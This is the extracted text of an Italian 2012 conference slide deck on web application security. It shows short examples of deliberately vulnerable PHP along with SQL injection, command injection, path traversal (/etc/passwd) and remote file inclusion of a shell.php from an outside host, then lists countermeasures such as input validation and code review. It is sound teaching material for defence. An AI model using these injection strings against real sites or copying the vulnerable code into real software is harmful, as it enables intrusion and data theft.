Alessio L.R. Pennasilicomayhem@alba.st

Roma, Ottobre 2012

Odio le mie webapp. Ma soprattutto chi le ha scritte!

Alessio L.R. Pennasilico

Alessio L.R. Pennasilico

Committed: AIP Associazione Informatici Professionisti, CLUSIT

AIPSI Associazione Italiana Professionisti Sicurezza Informatica

Italian Linux Society, Sikurezza.org, AIP/OPSI

Hacker’s Profiling Project, CrISTAL

2

!

Security Evangelist @

http

://w

ww

.alb

a.st

/

Le applicazoni web

Alessio L.R. Pennasilico

Web è bello!

Lavoro ovunque, comunque, a qualsiasi ora, con qualsiasi device, accedendo a tutte le informazioni

che mi servono.

4

Alessio L.R. Pennasilico

Dove stava scritto sicurezza? :(

5

http

://w

ww

.alb

a.st

/

Cosa si trova in giro

Alessio L.R. Pennasilico

XSS

Affligge siti web con scarso controllo di variabili derivate da input dell'utente. Permette di inserire codice a livello browser al fine di modificare il codice sorgente della pagina web visitata. In questo modo un cracker può tentare di recuperare dati sensibili quali cookies.

7

Alessio L.R. Pennasilico

SQL Injection

Sfrutta la non normalizzazione dell’input

a‘ OR ‘1’=’1

8

Alessio L.R. Pennasilico

Funzioni

exec() - system() - eval()

<?phpsystem("echo  ".$_REQUEST['parametro']);?>

Se la usassi così?http://host/index.php?parametro=;touch  /tmp/hacked

9

Alessio L.R. Pennasilico

Local File Inclusion

<?phpinclude('/var/www/articoli/'  .  $_REQUEST['articolo']);?>

L'utilizzo normale sarebbe:http://host/index.php?articolo=sport.html

ma posso usarlo così:http://host/index.php?articolo=../../../etc/passwd

10

Alessio L.R. Pennasilico

Remote File Inclusion

<?php  include($_GET['page']);?>

Se la usassi così?http://host/index.php?page=http://xxx/shell.php

11

Alessio L.R. Pennasilico

Esempi reali

IIS Webservice

user e pass hardcoded

12

Alessio L.R. Pennasilico

Esempi reali

e-commerce

javascript

dati letti dal server ed inviati dal client

prezzi inclusi

13

Alessio L.R. Pennasilico

Esempi reali

Quanto sono comodi i tab?

14

http

://w

ww

.alb

a.st

/

Le contromisure

Alessio L.R. Pennasilico

Filtrare a monte

UTM Firewall

IDS / IPS

DLP

16

Alessio L.R. Pennasilico

Software layer

Reverse Proxy

mod_*

17

Alessio L.R. Pennasilico

Configurare bene il sistema

chroot

privilege drop

permessi

mod_*

18

Alessio L.R. Pennasilico

Scrivere bene le app

input validation

controlli server side

19

Alessio L.R. Pennasilico

Standard e check

OWASP - Code review

OSSTMM - PenTest

Repetita iuvant

20

Alessio L.R. Pennasilico

Mitigare...

Eliminare le classiche cause di vulnerabilità

es: le password!

21

Alessio L.R. Pennasilico

Spiegare

Molti attacchi si possono evitare

con la user awarness

22

http

://w

ww

.alb

a.st

/

Risolvere il problema

Alessio L.R. Pennasilico

Conclusioni

Senza scrivere buon codice

tutto il resto è un palliativo!

24

Alessio L.R. Pennasilico

Conclusioni

Preoccupatevi delle persone,

più della tecnologia!

25

Alessio L.R. Pennasilicomayhem@alba.st

Roma, Ottobre 2012

Grazie dell’attenzione! T h e s e s l i d e s a r e

written by Alessio L.R. P e n n a s i l i c o a k a mayhem. They are subjected to Creative Commons Attribution-S h a r e A l i k e - 2 . 5 version; you can copy, modify, or sell them. “Please” ci te your source and use the same licence :)